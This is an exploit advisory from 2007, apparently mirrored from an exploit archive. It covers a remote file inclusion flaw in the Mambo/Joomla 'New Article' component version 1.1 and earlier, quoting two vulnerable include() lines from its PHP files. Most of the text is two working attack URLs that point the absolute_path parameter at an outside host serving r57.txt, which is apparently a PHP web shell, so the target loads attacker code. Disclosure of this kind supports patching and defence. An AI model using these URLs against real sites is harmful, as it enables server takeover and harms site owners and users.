id: 1757
date: 04/13/2007
title: Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
author: Cold Zero
cves: 

======================================================================
Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
======================================================================



=======================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple 
RFI
=======================================================
Script Site : 
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.php');     <= 
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.php');     <= Line 
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================



#  0day.today [2023-03-26]  #